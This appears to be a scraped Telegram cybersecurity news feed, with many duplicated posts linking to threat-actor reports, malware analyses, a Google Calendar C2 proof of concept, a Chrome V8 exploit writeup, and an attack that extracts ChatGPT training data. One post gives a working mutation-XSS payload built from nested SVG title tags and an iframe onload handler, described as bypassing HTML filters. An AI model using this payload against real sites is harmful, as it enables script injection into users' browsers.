Cyber-Attack apparently deciphered.
Kazakhstan-associated YoroTrooper disguises the origin of attacks as Azerbaijan.
https://blog.talosintelligence.com/attributing-yorotrooper/
Kazakhstan-associated YoroTrooper disguises the origin of attacks as Azerbaijan.
https://blog.talosintelligence.com/attributing-yorotrooper/
Cisco Talos
Kazakhstan-associated YoroTrooper disguises origin of attacks as Azerbaijan
Cisco Talos assesses with high confidence that YoroTrooper, an espionage-focused threat actor first active in June 2022, likely consists of individuals from Kazakhstan based on their use of Kazakh currency and fluency in Kazakh and Russian.
Hacking Some More Secure USB Flash Drives (Part I).
https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
SySS Tech Blog
Hacking Some More Secure USB Flash Drives (Part I)
During a research project in the beginning of 2022, SySS IT security expert Matthias Deeg found several security vulnerabilities in different tested USB flash drives with AES hardware encryption.
Raspberry Pi RP2040 Superior Boy Takes Cybersecurity on the Go.
https://www.hackster.io/superior-tech/advanced-cyber-security-and-education-device-superior-boy-133905
https://www.tomshardware.com/news/raspberry-pi-rp2040-superior-boy-takes-cybersecurity-on-the-go
https://www.hackster.io/superior-tech/advanced-cyber-security-and-education-device-superior-boy-133905
https://www.tomshardware.com/news/raspberry-pi-rp2040-superior-boy-takes-cybersecurity-on-the-go
Hackster.io
Advanced Cyber Security and Education Device - SUPERIOR BOY
Superior Boy is Cybersecurity, education, and research in one advanced device. Everything a mobile cybersecurity pro needs.
GCR - Google Calendar RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel (but some friends would say it cannot be :) very thanks to my mates "Tortellini" https://aptw.tf)
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel (but some friends would say it cannot be :) very thanks to my mates "Tortellini" https://aptw.tf)
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Zero-Day: Universal MXSS.
Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
<svg>
<title>
<title>
<image href="</title><iframe onload=alert(1)>">
</title>
</title>
</svg>This media is not supported in your browser
VIEW IN TELEGRAM
Anonymous (Hacktivist group) sends a message to the Israeli leader and government amid ongoing attack on children of Palestine.
Story; part of Israel-Palestine Cyber-War.
https://youtu.be/BGcHzs9LKQE
Story; part of Israel-Palestine Cyber-War.
https://youtu.be/BGcHzs9LKQE
Top_C_C_Methods_1699929574.pdf
8.1 MB
● Command and control methods with details.
An Indian hack-for-hire group targeted the United States, China, Myanmar, Pakistan, Kuwait, and other countries as part of a wide-ranging espionage, surveillance, and disruptive operation for over a decade.
The Appin Software Security (aka Appin Security Group), according to an in-depth analysis from SentinelOne, began as an educational startup offering offensive security training programs, while carrying out covert hacking operations since at least 2009.
https://thehackernews.com/2023/11/indian-hack-for-hire-group-targeted-us.html
https://thehackernews.com/2013/05/first-large-cyber-espionage-activity.html
The Appin Software Security (aka Appin Security Group), according to an in-depth analysis from SentinelOne, began as an educational startup offering offensive security training programs, while carrying out covert hacking operations since at least 2009.
https://thehackernews.com/2023/11/indian-hack-for-hire-group-targeted-us.html
https://thehackernews.com/2013/05/first-large-cyber-espionage-activity.html
ISRAEL GAZA CONFLICT THE CYBER PERSPECTIVE.pdf
1.8 MB
Documentation of cyber activity amid the Israel Palestine war.
Russian state hackers spread USB worm worldwide.
LitterDrifter worm has been traced back to Russia’s Federal Security Service.
Malware Spotlight – Into the Trash: Analyzing LitterDrifter
https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/
https://www.independent.co.uk/tech/russian-state-hackers-spread-usb-worm-worldwide-b2451776.html
LitterDrifter worm has been traced back to Russia’s Federal Security Service.
Malware Spotlight – Into the Trash: Analyzing LitterDrifter
https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/
https://www.independent.co.uk/tech/russian-state-hackers-spread-usb-worm-worldwide-b2451776.html
Check Point Research
Malware Spotlight - Into the Trash: Analyzing LitterDrifter - Check Point Research
Introduction Gamaredon, also known as Primitive Bear, ACTINIUM, and Shuckworm, is a unique player in the Russian espionage ecosystem that targets a wide variety of almost exclusively Ukrainian entities. While researchers often struggle to uncover evidence…
Shadowy hacking group targeting Israel shows outsized capabilities. Islarel Palestine conflict.
A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.
https://cyberscoop.com/hacking-israel-wild-card/
A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.
https://cyberscoop.com/hacking-israel-wild-card/
CyberScoop
Shadowy hacking group targeting Israel shows outsized capabilities
A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.
Google Researchers’ Attack Prompts ChatGPT to Reveal Its Training Data.
https://www.404media.co/google-researchers-attack-convinces-chatgpt-to-reveal-its-training-data/
https://www.404media.co/google-researchers-attack-convinces-chatgpt-to-reveal-its-training-data/
404 Media
Google Researchers’ Attack Prompts ChatGPT to Reveal Its Training Data
ChatGPT is full of sensitive private information and spits out verbatim text from CNN, Goodreads, WordPress blogs, fandom wikis, Terms of Service agreements, Stack Overflow source code, Wikipedia pages, news blogs, random internet comments, and much more.
Google Chrome V8 ArrayShift Race Condition Remote Code Execution.
https://blog.exodusintel.com/2023/05/16/google-chrome-v8-arrayshift-race-condition-remote-code-execution/
https://blog.exodusintel.com/2023/05/16/google-chrome-v8-arrayshift-race-condition-remote-code-execution/
Exodus Intelligence
Google Chrome V8 ArrayShift Race Condition Remote Code Execution - Exodus Intelligence
By Javier Jimenez Overview This post describes a method of exploiting a race condition in the V8 JavaScript engine, version 9.1.269.33. The vulnerability affects the following versions of Chrome and Edge: Google Chrome versions between 90.0.4430.0 and 91.0.4472.100.…
Reuters
How an Indian startup hacked the world
Appin was a leading Indian cyberespionage firm that few people even knew existed. A Reuters investigation found that the company grew from an educational startup to a hack-for-hire powerhouse that stole secrets from business titans, politicians, military…
Indian government asks Reuters news agency 📰 to take down an article titled "How an Indian startup hacked the world 🌍"
Reuters had published the article and removed it after the Indian court order.
Reuters released the details about this: https://www.reuters.com/investigates/special-report/usa-hackers-appin/
It is likely that the article mentioned criminal activity by the startup that involved people in power and access.
Reuters had published the article and removed it after the Indian court order.
Reuters released the details about this: https://www.reuters.com/investigates/special-report/usa-hackers-appin/
It is likely that the article mentioned criminal activity by the startup that involved people in power and access.
How an Indian startup (Appin) hacked the world 🌍
https://web.archive.org/web/20231117025741/https://www.reuters.com/investigates/special-report/usa-hackers-appin/
https://web.archive.org/web/20231117025741/https://www.reuters.com/investigates/special-report/usa-hackers-appin/
Reuters
How an Indian startup hacked the world
Appin was a leading Indian cyberespionage firm that few people even knew existed. A Reuters investigation found that the company grew from an educational startup to a hack-for-hire powerhouse that stole secrets from business titans, politicians, military…
Unmasking the Enigma: A Historical Dive into the World of PlugX Malware.
https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html
https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html
Splunk
Unmasking the Enigma: A Historical Dive into the World of PlugX Malware | Splunk
The Splunk Threat Research Team (STRT) unravels the mystery of a PlugX variant, peeling back the layers of its payload, tactics, and impact on the digital realm.